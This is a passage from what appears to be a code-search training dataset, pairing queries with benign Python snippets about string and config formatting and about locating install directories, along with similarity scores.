no cover\n sections.append((\"Schemas\", schema_context))\n if model_context: # pragma: no cover\n sections.append((\"Models\", model_context))\n\n additional_context_keys = (\n full_context.keys()\n - flask_context.keys()\n - schema_context.keys()\n - model_context.keys()\n )\n additional_context = {\n key: full_context[key] for key in additional_context_keys\n }\n if additional_context:\n sections.append((\"Additional\", additional_context))\n return \"\\n\".join([format_section(*section) for section in sections])", "def __format__(self, format_spec):\n # Reject anything that isn't an s\n if format_spec[-1] != 's':\n raise ValueError('{} format specifier not understood for this object',\n format_spec[:-1])\n # Output in this example will be (<a>,<b>,<c>)\n raw = \"(\" + \",\".join([str(self.a), str(self.b), str(self.c)]) + \")\"\n # Honor the format language by using the inbuilt string format\n # Since we know the original format_spec ends in an 's'\n # we can take advantage of the str.format method with a\n # string argument we constructed above\n return \"{r:{f}}\".format( r=raw, f=format_spec )", "def formatargvalues(args, varargs, varkw, locals,\r\n formatarg=str,\r\n formatvarargs=lambda name: '*' + name,\r\n formatvarkw=lambda name: '**' + name,\r\n formatvalue=lambda value: '=' + repr(value),\r\n join=joinseq):\r\n def convert(name, locals=locals,\r\n formatarg=formatarg, formatvalue=formatvalue):\r\n return formatarg(name) + formatvalue(locals[name])\r\n specs = []\r\n for i in range(len(args)):\r\n specs.append(strseq(args[i], convert, join))\r\n if varargs:\r\n specs.append(formatvarargs(varargs) + formatvalue(locals[varargs]))\r\n if varkw:\r\n specs.append(formatvarkw(varkw) + formatvalue(locals[varkw]))\r\n return '(' + string.join(specs, ', ') + ')'", "def str(self):\n\n list_of_entries = ['{0} name={1}'.format(self.layer_type, self.name)]\n for key, value in sorted(self.config.items()):\n if isinstance(value, str) and re.search('=', value):\n # the value is a string that contains an '=' sign, so we need to\n # enclose it in double-quotes, otherwise we woudldn't be able to\n # parse from that output.\n if re.search('\"', value):\n print(\"Warning: config '{0}={1}' contains both double-quotes \"\n \"and equals sign; it will not be possible to parse it \"\n \"from the file.\".format(key, value), file=sys.stderr)\n list_of_entries.append('{0}=\"{1}\"'.format(key, value))\n else:\n list_of_entries.append('{0}={1}'.format(key, value))\n\n return ' '.join(list_of_entries)", "def _format(self):\n min_value = self.replacements.get(str(self.min), str(self.min))\n max_value = self.replacements.get(str(self.max), str(self.max))\n l_brace = '(' if min_value.find('inf') != -1 else '['\n r_brace = ')' if max_value.find('inf') != -1 else ']'\n\n return '{l_brace}{min_value}, {max_value}{r_brace}'.format(\n l_brace=l_brace, r_brace=r_brace,\n min_value=min_value, max_value=max_value)", "def generate_context_output(context, indent=0):\r\n # Generate output text for values\r\n values = H.unicode_string('')\r\n if not isinstance(context, dict):\r\n return values\r\n for variable in context.values():\r\n has_children = False\r\n property_text = ''\r\n # Set indentation\r\n for i in range(indent): property_text += '\\t'\r\n # Property with value\r\n if variable['value'] is not None:\r\n if variable['name']:\r\n property_text += '{name} = '\r\n property_text += '({type}) {value}\\n'\r\n # Property with children\r\n elif isinstance(variable['children'], dict) and variable['numchildren'] is not None:\r\n has_children = True\r\n if variable['name']:\r\n property_text += '{name} = '\r\n property_text += '{type}[{numchildren}]\\n'\r\n # Unknown property\r\n else:\r\n if variable['name']:\r\n property_text += '{name} = '\r\n property_text += '<{type}>\\n'\r\n\r\n # Remove newlines in value to prevent incorrect indentation\r\n value = ''\r\n if variable['value'] and len(variable['value']) > 0:\r\n value = variable['value'].replace(\"\\r\\n\", \"\\n\").replace(\"\\n\", \" \")\r\n\r\n # Format string and append to output\r\n values += H.unicode_string(property_text \\\r\n .format(value=value, type=variable['type'], name=variable['name'], numchildren=variable['numchildren']))\r\n\r\n # Append property children to output\r\n if has_children:\r\n # Get children for property (no need to convert, already unicode)\r\n values += generate_context_output(variable['children'], indent+1)\r\n # Use ellipsis to indicate that results have been truncated\r\n limited = False\r\n if isinstance(variable['numchildren'], int) or H.is_digit(variable['numchildren']):\r\n if int(variable['numchildren']) != len(variable['children']):\r\n limited = True\r\n elif len(variable['children']) > 0 and not variable['numchildren']:\r\n limited = True\r\n if limited:\r\n for i in range(indent+1): values += H.unicode_string('\\t')\r\n values += H.unicode_string('...\\n')\r\n return values", "def logging_template():\n template = (\n '[loggers]\\n'\n 'keys=root\\n'\n '\\n'\n '[handlers]\\n'\n 'keys=consoleHandler\\n'\n '\\n'\n '[formatters]\\n'\n 'keys=simpleFormatter\\n'\n '\\n'\n '[logger_root]\\n'\n 'level=DEBUG\\n'\n 'handlers=consoleHandler\\n'\n '\\n'\n '[handler_consoleHandler]\\n'\n 'class=StreamHandler\\n'\n 'level=DEBUG\\n'\n 'formatter=simpleFormatter\\n'\n 'args=(sys.stdout,)\\n'\n '\\n'\n '[formatter_simpleFormatter]\\n'\n 'format=%(asctime)s - %(name)s - %(levelname)s - %(message)s\\n'\n 'datefmt=\\n')\n return template", "def format_relabel_config(\n source_labels=(), action='', regex='', target_label='', replacement=''):\n return (\n ' - source_labels: [{0}]\\n'\n ' action: {1}\\n'\n ' regex: {2}\\n'\n ' target_label: {3}\\n'\n ' replacement: {4}'\n ).format(\n ', '.join(source_labels),\n action,\n regex,\n target_label,\n replacement,\n )", "def format_arguments(data: Dict) -> str:\n\n def prep(key: str, value: Any) -> str:\n if isinstance(value, str):\n value = f'''\"{value.replace('\"', \"'\")}\"'''\n if key == \"pattern\":\n value = f\"r{value}\"\n return f\"{key}={value}\"\n\n return \",\\n\".join([prep(key, value) for key, value in data.items()])", "def _write_config(template_string: str, destination: Path, **template_vars) -> None:\n rendered = template_string.format(**template_vars)\n destination.write_text(rendered)", "def pformat(obj, incr=\" \"):\n def sub_pformat(obj):\n txt = pformat(obj, incr=incr)\n return indent(txt, incr)\n # Try short version.\n short_len = 60\n maybe_short = pp.pformat(obj)\n if \"\\n\" not in maybe_short and len(maybe_short) <= short_len:\n return maybe_short\n\n if isinstance(obj, list):\n out = f\"[\\n\"\n for obj_i in obj:\n out += sub_pformat(obj_i) + \",\\n\"\n out += f\"]\"\n return out\n elif isinstance(obj, dict):\n out = f\"{{\\n\"\n for k_i, obj_i in obj.items():\n txt = sub_pformat(obj_i)\n out += f\"{incr}{repr(k_i)}: {txt.strip()},\\n\"\n out += f\"}}\"\n return out\n else:\n return indent(pp.pformat(obj), incr)", "def make_scale_config_entry(class_path, name, cmd_line_format=True, **kwargs):\n d = dict(**kwargs)\n # XXX: can't use 'class' as a kwarg in call to dict, so doing it this way...\n d['class'] = class_path\n if cmd_line_format:\n return \"'%s' \" % json.dumps({name: d}).replace('\"', r'\\\"')\n else:\n return json.dumps({name: d})", "def __format__(self, formatstr):\n if formatstr.strip() == '': # Defualt behaviour mirrors self.__str__()\n formatstr = '+.3f'\n\n string = \\\n \"{:\" + formatstr +\"} \" + \\\n \"{:\" + formatstr +\"}i \" + \\\n \"{:\" + formatstr +\"}j \" + \\\n \"{:\" + formatstr +\"}k\"\n return string.format(self.q[0], self.q[1], self.q[2], self.q[3])", "def format(\n self,\n format_string,\n module=None,\n param_dict=None,\n force_composite=False,\n attr_getter=None,\n ):\n if param_dict is None:\n param_dict = {}\n\n # if the processed format string is not in the cache then create it.\n if format_string not in self.block_cache:\n self.build_block(format_string)\n\n first_block = self.block_cache[format_string]\n\n def get_parameter(key):\n \"\"\"\n function that finds and returns the value for a placeholder.\n \"\"\"\n if key in param_dict:\n # was a supplied parameter\n param = param_dict.get(key)\n elif module and hasattr(module, key):\n param = getattr(module, key)\n if hasattr(param, \"__call__\"):\n # we don't allow module methods\n raise Exception()\n elif attr_getter:\n # get value from attr_getter function\n try:\n param = attr_getter(key)\n except: # noqa e722\n raise Exception()\n else:\n raise Exception()\n if isinstance(param, Composite):\n if param.text():\n param = param.copy()\n else:\n param = \"\"\n return param\n\n # render our processed format\n valid, output = first_block.render(get_parameter, module)\n\n # clean things up a little\n if isinstance(output, list):\n output = Composite(output)\n if not output:\n if force_composite:\n output = Composite()\n else:\n output = \"\"\n\n return output", "def format_field(self, value, spec):\n cache = Cache()\n if spec == \"co\":\n # if cache(re.match(\"(.*)co$\", spec)):\n value = co_join(value)\n spec = \"s\"\n # cache.output.group(1) + \"s\"\n elif cache(re.match(r\"^sub(\\d?)_?(.*)$\", spec)):\n depth = (1 if cache.output.group(1) == \"\" else\n int(cache.output.group(1)))\n value = \"\\n\".join([\n \"{0}{1} = {2}\".format(depth * \" \", key, val)\n for key, val in value.items()])\n if cache.output.group(2) != \"\":\n value = (\n depth * \"[\" + cache.output.group(2) + depth * \"]\" + \"\\n\" +\n value)\n spec = \"s\"\n return super(Format, self).format_field(value, spec)", "def basicConfig(**kwargs):\n # Add thread safety in case someone mistakenly calls\n # basicConfig() from multiple threads\n logging._acquireLock()\n try:\n if len(logging.root.handlers) == 0:\n handlers = kwargs.pop(\"handlers\", None)\n if handlers is None:\n if \"stream\" in kwargs and \"filename\" in kwargs:\n raise ValueError(\"'stream' and 'filename' should not be \"\n \"specified together\")\n else:\n if \"stream\" in kwargs or \"filename\" in kwargs:\n raise ValueError(\"'stream' or 'filename' should not be \"\n \"specified together with 'handlers'\")\n if handlers is None:\n filename = kwargs.pop(\"filename\", None)\n mode = kwargs.pop(\"filemode\", 'a')\n if filename:\n h = logging.FileHandler(filename, mode)\n else:\n stream = kwargs.pop(\"stream\", None)\n h = logging.StreamHandler(stream)\n handlers = [h]\n dfs = kwargs.pop(\"datefmt\", None)\n style = kwargs.pop(\"style\", '%')\n if style not in _STYLES:\n raise ValueError('Style must be one of: %s' % ','.join(\n _STYLES.keys()))\n fs = kwargs.pop(\"format\", BASIC_FORMAT)\n fmt = JsonFormatter(fs, dfs, style)\n for h in handlers:\n if h.formatter is None:\n h.setFormatter(fmt)\n logging.root.addHandler(h)\n level = kwargs.pop(\"level\", None)\n if level is not None:\n logging.root.setLevel(level)\n if kwargs:\n keys = ', '.join(kwargs.keys())\n raise ValueError('Unrecognised argument(s): %s' % keys)\n finally:\n logging._releaseLock()", "def _repr_kwargs(self):\n\n ret = \"\"\n if self.options.growth:\n ret += \", growth=True\"\n elif self.options.circular:\n ret += \", circular=True\"\n\n return ret", "def __makeFormatString(self):\n self.__formatString = \"\"\n for f in self.__columns:\n self.__formatString += \"%(\"+ f + \")-\" + str(self.__widths[f]) + \\\n \"s \"", "def __str__(self):\n return (\"{{'global_config' : {0._global}, \"\n \"'local_config' : {0._local}, \"\n \"'on_demand_config': {0._on_demand}, \"\n \"'recent_caller' : '{0._recent_caller}'}}\".format(self))", "def build_strings(self, config_dict):\n\n # print(config_dict)\n self.string_cond.update(config_dict)", "def _format_msg(self, format_str, *args):\n if not args:\n format_str = six.moves.urllib.parse.unquote(format_str)\n return \"{} - - [{}] {}\\n\".format(\n self.client_address[0],\n self.log_date_time_string(),\n format_str % args\n )", "def generate_help(\n config_cls: type[T], formatter: Callable | None = None, **kwargs: Any\n) -> str:\n if formatter is None:\n formatter = _format_help_dicts\n help_dicts = _generate_help_dicts(config_cls)\n\n return formatter(help_dicts, **kwargs)", "def format(self, valDict):\n return self._formatStr % valDict", "def format(self, *args: object, **kwargs: object) -> HTML:\n return HTML(FORMATTER.vformat(self.value, args, kwargs))", "def local_config(self):\n return f'''\n{self.interface}\n\n{self.peers}\n'''", "def show_config(config, args):\n pprint.pprint(config)", "def __str__(self):\n\n # can't use backslash in f-string\n newline = \"\\n\"\n\n options = self.options\n kwoptions = self.kwoptions\n\n # add background to options\n if self.background:\n options.append(\"show background rectangle\")\n kwoptions.update({\"background rectangle/.style\": f\"{{fill={self.background}}}\"})\n\n return rf\"\"\"\\begin{{tikzpicture}}{wrap(fmt_options(self.options, self.kwoptions))}\n{newline.join(define_colours(self._used_colours))}\n{newline.join(self.defines)}\n{newline.join(self._commands)}\n\\end{{tikzpicture}}\"\"\"", "def formatall(obj):\n result = \"\"\n if isinstance(obj, list):\n# i = 0\n for obj in obj:\n #printf(\">>> [%d] >>> \", i)\n result += format(obj)\n result += \"\\n\"\n# i += 1\n return result\n if isinstance(obj, dict):\n for key, value in obj.items():\n result += \"%-15s : \" % key\n result += format(value)\n result += \"\\n\"\n return result\n return format(obj)", "def string(self, string, values=None):\n if values:\n values = self.values(values)\n return string.format(*values)\n return string", "def _trans_format(self):\n config_dict = vars(self._config)\n for item, value in config_dict.items():\n if value == 'None':\n config_dict[item] = None\n elif isinstance(value, str) and is_number(value):\n if value.isdigit():\n value = int(value)\n else:\n value = float(value)\n config_dict[item] = value", "def __str__(self):\n if self.flaky:\n fmt = 'flaky | '\n else:\n fmt = ''\n fmt += '{2}: {0}'\n if self.variant:\n fmt += ' {1}'\n return fmt.format(*self)", "def call_str(pvs):\n s = \"'{}', '{}'\".format(pvs.get('place'), pvs.get('stat_var'))\n if pvs.get('measurement_method'):\n s += \", measurement_method='{}'\".format(\n pvs.get('measurement_method'))\n if pvs.get('observation_period'):\n s += \", observation_period='{}'\".format(\n pvs.get('observation_period'))\n if pvs.get('unit'):\n s += \", unit='{}'\".format(pvs.get('unit'))\n if pvs.get('scaling_factor'):\n s += \", scaling_factor={}\".format(pvs.get('scaling_factor'))\n return s", "def __str__():\n return str(_config)", "def _repr_kwargs(self):\n\n ret = \"\"\n if self.options.growth:\n ret += \", growth=True\"\n elif self.options.circular:\n ret += \", circular=True\"\n else:\n if not self.options.underflow:\n ret += \", underflow=False\"\n if not self.options.overflow:\n ret += \", overflow=False\"\n\n return ret", "def test_repr_config(self) -> None:\n self.assertEqual(\n repr(self.config), \"TMConfiguration('q2', TMTape('abcdefghij', '.', 2))\"\n )\n self.assertEqual(\n repr(self.config2),\n \"MTMConfiguration('q1', (TMTape('abcdefghij', '.', 2), \"\n + \"TMTape('klmnopq', '.', 5)))\",\n )", "def get_format_opts(cls, format_=\"value\", fields=[]):\n return \" -f {0} {1}\".format(format_, \" \".join([\"-c \" + it for it in fields]))", "def _formatted_string(self, message: str, dict_values: dict) -> str:\n formatted_values = self._format_values_in_map(dict_values)\n return message.format(**formatted_values)", "def test_nested_format_fields():\n '{0:>{1}}'.format(42, 24)\n '{0:{a[1]}} {a}'.format(1, a=[1, 2])\n '{:>{}}'.format(42, 24)\n '{0:>{1}}'.format(42)\n '{0:>{1}}'.format(42, 24, 54)\n ##Warn: W1303\n '{0:{a[1]}}'.format(1)\n ##Warn: W1306\n '{0:{a.x}}'.format(1, a=2)", "def trans_format(trans_key, **kwargs):\n translated: str = _(trans_key)\n return translated.format(**kwargs)", "def format_dict(dictionary, depth=0):\n tab = \" \" * 4\n string = \"{\\n\"\n for key, val in dictionary.items():\n string += depth * tab \n string += \"{}: \".format(key)\n if type(val) is dict:\n string += format_dict(val, depth + 1)\n \n else:\n if type(val) is str:\n fmt = \"'{}'\\n\"\n else:\n fmt = \"{}\\n\"\n string += fmt.format(val)\n string += (depth) * tab + '}\\n'\n return string", "def formatargspec(args, varargs=None, varkw=None, defaults=None,\r\n formatarg=str,\r\n formatvarargs=lambda name: '*' + name,\r\n formatvarkw=lambda name: '**' + name,\r\n formatvalue=lambda value: '=' + repr(value),\r\n join=joinseq):\r\n specs = []\r\n if defaults:\r\n firstdefault = len(args) - len(defaults)\r\n for i, arg in enumerate(args):\r\n spec = strseq(arg, formatarg, join)\r\n if defaults and i >= firstdefault:\r\n spec = spec + formatvalue(defaults[i - firstdefault])\r\n specs.append(spec)\r\n if varargs is not None:\r\n specs.append(formatvarargs(varargs))\r\n if varkw is not None:\r\n specs.append(formatvarkw(varkw))\r\n return '(' + string.join(specs, ', ') + ')'", "def format_parameter_value(self, param_config, precision):\n # type: (Dict[str, Any], int) -> str\n return \"\"", "def _format_obj(cls, **kwargs):\n def doc_rebuilder(obj):\n if kwargs.pop('_VOID_',False):\n return ''\n try:\n doc = getattr(obj,'__doc__')\n assert doc\n except:\n return ''\n else:\n return doc.format(**kwargs) # str(doc).format(**kwargs)\n return doc_rebuilder", "def repr_str(obj, attrs, update=None):\n props = [\n (attr, value)\n for attr, value in (\n (attr, getattr(obj, attr))\n for attr in attrs\n )\n if value is not None\n ]\n\n if update is not None:\n props = update(props)\n\n props_str = ', '.join('%s=%s' % (attr, value) for attr, value in props)\n return \"<{klass}: {props_str}>\".format(\n klass=obj.__class__.__name__,\n props_str=props_str,\n )", "def _format_msg(self, format_str, *args):\r\n return u\"{0} - - [{1}] {2}\\n\".format(\r\n self.client_address[0],\r\n self.log_date_time_string(),\r\n format_str % args\r\n )", "def format_property(name, value, annotations):\n\n annotation = annotations.get(name)\n type_str = annotation.__name__ if annotation else typing.Any\n return \"{} = ... # type: {}\".format(name, type_str)", "def write_config_string(input_dict, entry_char='>', attribution_char='=',\n usekeys=None):\n # Selects the desired entries of the input_dict\n if usekeys is not None:\n input_dict = {key: input_dict[key] for key in usekeys}\n\n result_str = \"\"\n\n for key, value in input_dict.items():\n result_str += entry_string(key, value, entry_char, attribution_char)\n\n return result_str", "def print_config(config):\n # pprint.pprint(config)\n headers = [u'name', u'flavor', u'ip-addresses', u'image-id']\n pt = prettytable.PrettyTable(headers)\n pt.align[\"name\"] = 'l'\n pt.align[\"flavor\"] = 'l' \n for s in config[\"servers\"]:\n server = config[\"servers\"][s]\n tds = []\n tds.append(s)\n tds.append(server['flavor'])\n # make a nice list of networks:\n nets = \"\"\n for ip in server['ip-addresses'].keys():\n nets = nets + \"%s: %s\\n\" % (ip, server['ip-addresses'][ip]) \n tds.append(nets)\n tds.append(server['image-id'])\n \n pt.add_row(tds)\n print pt.get_string()", "def resolve(text, *args, **kwargs):\n text = gettext(text)\n # Allways close formatting\n text += '{c.end}{c.default}'\n colors = NO_COLORS\n if not settings.opt('no_color'):\n colors = COLORS\n return text.format(*args, c=colors, **kwargs)", "def _format(self):\n output = f\"\\n{color('>>> DUMP')} from {self.filename}: {color(f'L{self.line}')} in {color(f'{self.method}()')}\"\n\n for name, obj in self.objects.items():\n output += f\"\\n\\n{color(f' - {name}:')}\\n\"\n output += f\" {pformat(obj, width=110, indent=4)}\"\n\n output += color(\"\\n\\n<<< END\")\n return output", "def _render_config(self, config, path):\n if self._check_for_custom_config(path):\n self._use_custom_config(path)\n return\n\n with open(self._get_tempdir() + '/' + path, 'w') as f:\n for section, settings in config.items():\n f.write('[' + section + ']\\n')\n for k, v in settings.items():\n r = str(v).lower() if isinstance(v, bool) else str(v)\n f.write(k + '=' + r + '\\n')\n f.write('\\n')", "def formatTargets(self, **kwargs):\n for key, val in kwargs.items():\n self.formatTarget(key, val)", "def __str__(self):\n return (\"\"\"\n{\n %s: {\n start_time: %s,\n stop_time: %s\n }\n}\"\"\" % (self._name, self._start_time, self._stop_time)\n )", "def show_config(args):\n args = args.__dict__\n\n log.warning('tomolog status start')\n for section, name in zip(SECTIONS, NICE_NAMES):\n entries = sorted((k for k in args.keys() if k.replace('_', '-') in SECTIONS[section]))\n if entries:\n for entry in entries:\n value = args[entry] if args[entry] != None else \"-\"\n log.info(\" {:<16} {}\".format(entry, value))\n\n log.warning('tomolog status end')", "def _format_dimensions(dimensions):\n if not dimensions:\n return \"\"\n\n dim_pairs = [\"%s=%s\" % (k, v) for k, v in dimensions.items()]\n return \"[%s]\" % (\",\".join(dim_pairs))", "def _config_str(config: Config) -> str:\n _C = config\n\n __C: CN = CN({\"RANDOM_SEED\": _C.random_seed})\n common_string: str = str(__C) + \"\\n\"\n\n return common_string", "def __repr__(self):\n string = ''\n for key, val in self.setting().items():\n string += '{}({})\\n'.format(key, val)\n return string", "def format(self,\n tree: Tree,\n indent: Union[int, None] = -1,\n compact: bool = False) -> str:\n if not isinstance(tree, Tree):\n tree = Tree(tree)\n vars = [var for var, _ in tree.nodes()] if compact else []\n parts = ['# ::{}{}'.format(key, ' ' + value if value else value)\n for key, value in tree.metadata.items()]\n parts.append(self._format_node(tree.node, indent, 0, set(vars)))\n return '\\n'.join(parts)", "def __str__(self):\n template = ('Bounds: minx={f}, miny={f}, minz={f}\\n '\n 'maxx={f}, maxy={f}, maxz={f}'.format(f=self._format))\n # Formatter must be recreated each time to reset value counter\n return NoneFormatter().format(template, *self)", "def __str__(self):\n return \"%s #config from: %s\" % (self._config, self._realpath)", "def format(self, *args,\n bullet: Union[str, bool] = None,\n style: StyleOptions = None,\n key_style: StyleOptions = None) -> str:\n if len(args) == 0:\n return \"\"\n\n if len(args) == 1:\n obj = args[0]\n elif len(args) == 2 and self.print_name_value_pairs:\n obj = {args[0]: args[1]}\n else:\n obj = args\n\n if bullet:\n bullet = self._normalize_bullet(bullet)\n if is_bullettable(obj):\n return self._format_aux(obj,\n bullet=bullet,\n style=style,\n key_style=key_style)\n elif self._bullet != bullet:\n ori_bullet = self._bullet\n self._bullet = bullet\n self._update()\n result = self._format_aux(obj,\n style=style,\n key_style=key_style)\n self._bullet = ori_bullet\n self._update()\n return result\n else:\n return self._format_aux(obj, style=style, key_style=key_style)\n else:\n return self._format_aux(obj, style=style, key_style=key_style)", "def format(value):\n if isinstance(value, str):\n return '\"{}\"'.format(value)\n if isinstance(value, bool):\n return 'true' if value is True else 'false'\n elif isinstance(value, dict):\n assert False, 'Not implemented for dictionary type'\n elif hasattr(value, '__len__'): # should cover list and numpy array\n return '{{{}}}'.format(', '.join([str(v) for v in value]))\n else: # assume scalar value\n return value", "def format(value, arg):\n try:\n if value is not None:\n # return (str(arg)) % value\n return (str(value)) % arg\n else:\n return \"\"\n except (ValueError, TypeError):\n return \"\"", "def pytest_configure(config):\n set_default_log_formatter(config, \"%(message)s\")", "def __str__(self):\n if len(self.__keys) == 0:\n return '{}'\n output = '{'\n fmt = '{}: {}, '\n for key, val in zip(self.__keys, self.__vals):\n output += fmt.format(repr(key), repr(val))\n return output[:-2] + '}'", "def get_formatted_messages(formats, label, context):\r\n format_templates = {}\r\n for format in formats:\r\n # conditionally turn off autoescaping for .txt extensions in format\r\n if format.endswith(\".txt\"):\r\n context.autoescape = False\r\n format_templates[format] = render_to_string((\r\n 'notification/%s/%s' % (label, format),\r\n 'notification/%s' % format), context_instance=context)\r\n return format_templates", "def __format__(self, format_spec: str) -> str:\n\n return format(self.balance, format_spec)", "def format_yaml(yaml, **kwargs):\n template = _YamlTemplate(yaml)\n try:\n return template.substitute(flatten(kwargs or {},\n reducer='dot'))\n except KeyError as e:\n raise RuntimeError(\n 'Unknown placeholder: {}'.format(e.args[0])) from e", "def test_print_config(self) -> None:\n out = io.StringIO()\n with contextlib.redirect_stdout(out):\n self.config.print()\n self.assertEqual(\n out.getvalue().rstrip(),\n \"{}: {}\\n{}\".format(\"q2\", \"abcdefghij\", \"^\".rjust(7)),\n )", "def autoformat(\n cls: Type[U] = None,\n /,\n params: Union[str, Iterable[str]] = ( # pylint: disable=unsubscriptable-object\n \"message\",\n \"msg\",\n ),\n):\n if isinstance(params, str):\n params = (params,)\n\n if cls is None:\n return functools.partial(autoformat, params=params)\n\n orig_init = cls.__init__\n signature = inspect.signature(orig_init)\n params = signature.parameters.keys() & set(params)\n\n @functools.wraps(orig_init)\n def init(*args, **kwargs):\n bounds = signature.bind(*args, **kwargs)\n bounds.apply_defaults()\n pre_formatted = {\n name: bounds.arguments.pop(name)\n for name in params\n if name in bounds.arguments\n }\n formatted = {\n name: string.format(**bounds.arguments)\n for name, string in pre_formatted.items()\n }\n for name, arg in formatted.items():\n bounds.arguments[name] = arg\n return orig_init(*bounds.args, **bounds.kwargs)\n\n # init.__signature__ = signature\n setattr(cls, \"__init__\", init)\n return cls", "def formatted(self) -> str:\r\n ...", "def render_build_args(options, ns):\n build_args = options.get('buildArgs', {})\n for key, value in build_args.items():\n build_args[key] = value.format(**ns)\n return build_args", "def format_config(config, endpoint_name):\n rest_endpoint = config[\"RECORDS_REST_ENDPOINTS\"][endpoint_name]\n api_list_route = \"/api{}\".format(rest_endpoint[\"list_route\"])\n api_mimetype = rest_endpoint[\"default_media_type\"]\n search_index = rest_endpoint[\"search_index\"]\n sort_options = config.get(\"RECORDS_REST_SORT_OPTIONS\", {}).get(\n search_index, {}\n )\n default_sort = config.get(\"RECORDS_REST_DEFAULT_SORT\", {}).get(\n search_index, {}\n )\n aggs = (\n config.get(\"RECORDS_REST_FACETS\", {})\n .get(search_index, {})\n .get(\"aggs\", {})\n )\n\n return {\n \"api\": api_list_route,\n \"mimetype\": api_mimetype,\n \"sort_options\": searchkit_sort_options(sort_options, default_sort),\n \"aggs\": searchkit_aggs(aggs),\n }", "def pformat_in_needed(obj, indent=4):\n if obj:\n formatted_string = pprint.pformat(obj, indent)\n indented_string = ''\n for line in formatted_string.split('\\n'):\n indented_string = indented_string + '\\n' + (' ' * indent * 2) + line\n return \"\\n{}\\n\".format(indented_string)" ]
[ "0.61522377", "0.61236", "0.60001415", "0.57900184", "0.57206047", "0.57040524", "0.5618517", "0.5617663", "0.56145966", "0.56098795", "0.5547251", "0.55374193", "0.5514143", "0.54919505", "0.5468669", "0.54580975", "0.54474247", "0.54033774", "0.5401085", "0.53975976", "0.539324", "0.53666776", "0.5347559", "0.53226763", "0.5318113", "0.52701443", "0.52681345", "0.5237397", "0.5222003", "0.5207491", "0.5207452", "0.518739", "0.51698196", "0.5156693", "0.5141262", "0.51375973", "0.5131888", "0.51223344", "0.51095355", "0.5107207", "0.5100755", "0.5098541", "0.5095662", "0.50955194", "0.5095053", "0.50936043", "0.5088247", "0.5085643", "0.50483036", "0.50182486", "0.5014046", "0.50110936", "0.5007818", "0.4997547", "0.49834123", "0.49772367", "0.49744326", "0.49743414", "0.4972733", "0.4961685", "0.49573478", "0.49546337", "0.49313325", "0.49242777", "0.49238962", "0.49175325", "0.49060982", "0.49056467", "0.48990154", "0.4884665", "0.48796248", "0.48590782", "0.48567155", "0.4852063", "0.4850981", "0.48498344", "0.48405844", "0.48275664", "0.4821687", "0.4819427", "0.4812204", "0.48069933", "0.480344", "0.4799001", "0.47931173", "0.4787891", "0.47863007", "0.47804224", "0.47734344", "0.47707477", "0.47688705", "0.4744038", "0.47432524", "0.47423226", "0.47406474", "0.47368243", "0.47349358", "0.47286054", "0.4728517", "0.47268125" ]
0.75447696
0
Directory where ixian is installed
def IXIAN(cls): import ixian return os.path.dirname(os.path.realpath(ixian.__file__))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_teamocil_dir() -> pathlib.Path:\n return pathlib.Path(\"~/.teamocil/\").expanduser()", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph5/src\"", "def get_installdir(self):\n import mewlo\n path = os.path.dirname(os.path.realpath(mewlo.__file__))\n return path", "def ifaces_dir(self):\n return self.system_path(self._ifaces_dir)", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/madgraph4/src\"", "def eplus_home(self):\n if self.idf.file_version <= Version(\"7.2\"):\n install_dir = self.idf.file_version.current_install_dir / \"bin\"\n else:\n install_dir = (\n self.idf.file_version.current_install_dir\n / \"PreProcess\"\n / \"GrndTempCalc\"\n )\n return install_dir.expand()", "def GetPackageDirectory():\n return os.path.dirname(__file__)", "def systemdir():\n if platform == 'windows':\n return os.path.join(os.environ['ProgramFiles'], 'automaton')\n else:\n return \"/etc/automaton/\"", "def package_dir(self):\r\n return \".\"", "def get_qiime_scripts_dir():\r\n script_fp = which('print_qiime_config.py')\r\n\r\n if script_fp is None:\r\n raise ScriptsDirError(\"Could not find the directory containing QIIME \"\r\n \"scripts. QIIME scripts must be accessible via \"\r\n \"the PATH environment variable, and they must \"\r\n \"be executable. Please ensure that you have a \"\r\n \"valid QIIME installation (see the QIIME \"\r\n \"Installation Guide: \"\r\n \"http://qiime.org/install/install.html).\")\r\n\r\n return dirname(script_fp)", "def personaldir():\n if platform == 'windows':\n return os.path.join(os.environ['APPDATA'], 'automaton')\n else:\n return os.path.expanduser('~/.automaton/')", "def rliPath():\r\n if isWindows():\r\n homeDir = win32api.GetShortPathName(os.path.expanduser('~'))\r\n return os.path.join(homeDir, 'AppData', 'Roaming', 'GRASS7', 'r.li')\r\n else:\r\n return os.path.join(os.path.expanduser(\"~\"), '.grass7', 'r.li')", "def path(self):\n installed_packages_folder_path = site.getsitepackages()[0]\n return f'{installed_packages_folder_path}/{SITE_PACKAGES_FOLDER_NAME}'", "def syspath():\n import sys\n pprint(sys.path)", "def home():\n if sys.prefix == sys.exec_prefix:\n return sys.prefix\n else:\n return ':'.join((sys.prefix, sys.exec_prefix))", "def get_axebindir():\n import sys\n\n if 'axesrc' in sys.modules:\n modfile = sys.modules['axesrc'].__file__\n axebindir = os.path.abspath(os.path.join(os.path.dirname(modfile),'../bin/'))\n\n else:\n from pyraf import iraf\n\n # just read all variables\n all_variables = iraf.getVarDict()\n\n arch = all_variables['arch']\n stsdas = all_variables['stsdas']\n # compose the bin directory\n axebindir = os.path.join(stsdas, 'bin'+arch)\n #axe = all_variables['axe']\n #axebindir = all_variables['axebin']\n\n # compose the bin directory\n #axebindir = os.path.join(axe, 'bin')\n\n # return the path\n return axebindir", "def radishdir():\n return __RADISH_FILES_DIR__", "def install_location(self):\r\n return self._content_at_path('/template/os/install/%s' % self.install_type)", "def datadir():\n return '../data/'", "def get_install_dir(self):\n return EventGenerator.get_install_dir(self) + \"/egs5\"", "def sirv_truth_dir(self):\n return op.join(self.root_dir, \"SIRV\")", "def lib_dir(self):\n raise NotImplementedError('Implement this property.')", "def get_qiime_project_dir():\r\n # Get the full path of util.py\r\n current_file_path = abspath(__file__)\r\n # Get the directory containing util.py\r\n current_dir_path = dirname(current_file_path)\r\n # Return the directory containing the directory containing util.py\r\n return dirname(current_dir_path)", "def set_syspath(self, hasal_dir):\n library_path = os.path.join(hasal_dir, \"lib\", \"sikuli\")\n sys.path.append(library_path)\n return library_path", "def get_enry_dir() -> str:\n return os.path.abspath(os.path.join(os.path.dirname(__file__), \"build\"))", "def thisdir():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n # Change this bit to match 